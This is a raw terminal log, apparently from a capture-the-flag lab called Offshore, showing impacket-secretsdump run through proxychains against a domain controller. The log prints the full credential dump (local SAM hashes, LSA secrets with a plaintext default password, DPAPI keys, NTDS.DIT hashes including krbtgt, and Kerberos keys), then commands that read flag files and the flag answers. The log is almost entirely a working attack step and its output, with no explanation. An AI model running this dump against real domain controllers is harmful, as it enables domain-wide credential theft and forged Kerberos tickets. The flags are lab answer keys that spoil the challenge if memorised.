└─$ proxychains -f proxychains4.conf impacket-secretsdump -dc-ip 172.16.4.5 -target-ip 172.16.4.5 -no-pass -k client.offshore.com/administrator@DC04.client.offshore.com 2>/dev/null
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x1c385a588e19901a24e9e8f14c132b13
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67e1046be5e785dd9773fb6bbeaad49c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CLIENT\DC04$:plain_password_hex:3c48a8b0a54a4ad8d59e169c79e0b2151cb39aca949970c70fdd2e980193bbe5d4c9ac4d4865ae955aea5a012e9bf2dfd6cfa1f21ee4cf2a3e4973c74f85e2dec8a52b314a60153571debfea81c7226fd3ac823863c6d596f92f46e55bc9b9d49c1eb65f2ac6155feb0a551a7bd5417716ee8e157c19c699ef236ca1788f379808633a8f598ac6eca59bd5e547aae4f95d404effce7bde773ce0bc6e1748f5eac501a32ae08bee4937011c7f07608267bf79b098c53986420ed921544a3516ade07a046e3aa23d742a1beb220c4eb6e2d13d0ca520d3da76ddaaae9e1986d75f661a805f4f5e15e8128abff42fb50aaf
CLIENT\DC04$:aad3b435b51404eeaad3b435b51404ee:10868ab257bff3c2c07f46912d1343cb:::
[*] DefaultPassword
(Unknown User):Nevertrustthebankers!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x8333ec913aedc47138003648ad58946542795faa
dpapi_userkey:0x6648259ca133f311dcd38a6bba489e27f54ca6d6
[*] NL$KM
0000 99 4F 5D 6C 55 B9 EC B5 0C 0B D8 75 A2 88 93 E4 .O]lU......u....
0010 C0 D9 EF C5 0D B9 40 57 92 39 9A BE 9D A5 83 ED ......@W.9......
0020 11 CB 71 7C AB 32 CD 11 FD 7A ED 2E AB BE F1 62 ..q|.2...z.....b
0030 58 F2 1D 8A AC 9F AC FB 32 17 D8 EE B3 BD A5 DC X.......2.......
NL$KM:994f5d6c55b9ecb50c0bd875a28893e4c0d9efc50db9405792399abe9da583ed11cb717cab32cd11fd7aed2eabbef16258f21d8aac9facfb3217d8eeb3bda5dc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a569f80ccd9fda0ea5e749d20aa80657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e39e9de17383beb368b35218c36512fd:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
offshore_adm:1104:aad3b435b51404eeaad3b435b51404ee:41b52c3a62bdf56dc69ccb0e7c7ebe6c:::
client_banking:1105:aad3b435b51404eeaad3b435b51404ee:c1403723973274b66e789363b396f5b5:::
bankvault:4109:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::
svc_clientsupport:4601:aad3b435b51404eeaad3b435b51404ee:9d9e699830214c433bcfecd5da790848:::
client_adm:4604:aad3b435b51404eeaad3b435b51404ee:5022c8b3716dbbbf91189c46f8582479:::
ben:4605:aad3b435b51404eeaad3b435b51404ee:2b8311a8a7642b775f351df788e09630:::
DC04$:1000:aad3b435b51404eeaad3b435b51404ee:10868ab257bff3c2c07f46912d1343cb:::
MS02$:1103:aad3b435b51404eeaad3b435b51404ee:dc7a49c0c36399ae87f3de623ebab985:::
svc_client_sec$:9102:aad3b435b51404eeaad3b435b51404ee:ecd4b75c59ea7dec665bed615cb609ea:::
ADMIN$:4105:aad3b435b51404eeaad3b435b51404ee:221876412d1e83be94a2ccefab55e29e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:95aae8610e13540f7f0931e95428b386194723c15b5664cb4050c397fc0094ac
Administrator:aes128-cts-hmac-sha1-96:e86dadf9cdd481147143e343fd23a630
Administrator:des-cbc-md5:bc79cd0bc1674676
krbtgt:aes256-cts-hmac-sha1-96:79befdc2c834b653a69a0f7b821ecc32b5646a4b49e4b7b1dc4405c1f465424f
krbtgt:aes128-cts-hmac-sha1-96:3c0c55015bd720de4894bb3d086fb241
krbtgt:des-cbc-md5:b570496b9eb50161
offshore_adm:aes256-cts-hmac-sha1-96:46978e0466d04fce83ffa265f8f87825ae45ea467d3240adb57020879c4639c0
offshore_adm:aes128-cts-hmac-sha1-96:b901240b61a3ff6ccc6dbf3964ad1a36
offshore_adm:des-cbc-md5:97e3f7c8d6d39e64
client_banking:aes256-cts-hmac-sha1-96:5b811f867318602c430774e8dfe6714ad84a5e72027afb291e2651f47f42e334
client_banking:aes128-cts-hmac-sha1-96:65c66e60fbebcb61329689d24724a4a9
client_banking:des-cbc-md5:2375df43abab9b26
bankvault:aes256-cts-hmac-sha1-96:d321792b35cd514604a65d0817b81d2d2b8656049d1c4f34b605b30985d4bc71
bankvault:aes128-cts-hmac-sha1-96:730aa710a301b6aae03cf34c69042a84
bankvault:des-cbc-md5:5ed5f4026d0bf27c
svc_clientsupport:aes256-cts-hmac-sha1-96:8e651b1edf6dcb2a00706889940f89882c112ceb9e35778d8854a82b21b9fb3a
svc_clientsupport:aes128-cts-hmac-sha1-96:c97705122d137b172a7d34d5a23de750
svc_clientsupport:des-cbc-md5:3eb3bf2fe90179a7
client_adm:aes256-cts-hmac-sha1-96:939b0e226885f6b672c743ea4ce807af6d3af6b2954b5e43e201af509e99ee5d
client_adm:aes128-cts-hmac-sha1-96:df065ae0e1844bb77787af37f7e7c8af
client_adm:des-cbc-md5:3eb340521ca4925d
ben:aes256-cts-hmac-sha1-96:1c443fca70d2a16f29ddff10ea0cde8bb6b4a8bfb87facf020563a0d5a7da6f4
ben:aes128-cts-hmac-sha1-96:832de13a4d57eedf6e543d2d170c5b60
ben:des-cbc-md5:988392020b048394
DC04$:aes256-cts-hmac-sha1-96:e81f4f470eb44a75415913c81f11794cadb9a50959221156e82ee70cc3b11fa8
DC04$:aes128-cts-hmac-sha1-96:e292256d519c2211e4ec27ef8b3cda4a
DC04$:des-cbc-md5:072ffea885ab4c2a
MS02$:aes256-cts-hmac-sha1-96:a7ef524856fbf9113682384b725292dec23e54ab4e66cfdca8dd292b1bb198ae
MS02$:aes128-cts-hmac-sha1-96:2210c0c6eeba4b862de170c36d34e86b
MS02$:des-cbc-md5:8391a4ba31457cf7
svc_client_sec$:aes256-cts-hmac-sha1-96:55a3f14e1972a4258c223f91c1d72b6d88871f324c39a64717cb76e078594108
svc_client_sec$:aes128-cts-hmac-sha1-96:1c30143572969a4a0b0a0b066dfeaf13
svc_client_sec$:des-cbc-md5:cee3f2bafbf18034
ADMIN$:aes256-cts-hmac-sha1-96:63988f23d0d548da6a8f2fd1f0a85ee9782cc3e4716c419d8584e3fc23a41076
ADMIN$:aes128-cts-hmac-sha1-96:34e1c92227fd2d92bb7f109e2457e870
ADMIN$:des-cbc-md5:1ca20bb615c1c104
[*] Cleaning up...
C:\>type C:\Users\Administrator\Desktop\flag.txt
OFFSHORE{c@r3ful_who_y0u_d3legate_t0}
C:\>type C:\Windows\SYSVOL\domain\Policies\{ABBDB649-E74D-4DDB-A6B3-9C1055BE903C}\Machine\flag.txt
OFFSHORE{d0nt_overl00k_gp0}
C:\>type C:\Windows\SYSVOL\sysvol\CLIENT.OFFSHORE.COM\Policies\{ABBDB649-E74D-4DDB-A6B3-9C1055BE903C}\Machine\flag.txt
OFFSHORE{d0nt_overl00k_gp0}
OFFSHORE{h1dd3n_1n_pl@iN_$1ght}
MS02
OFFSHORE{th3_fin@l_h0p}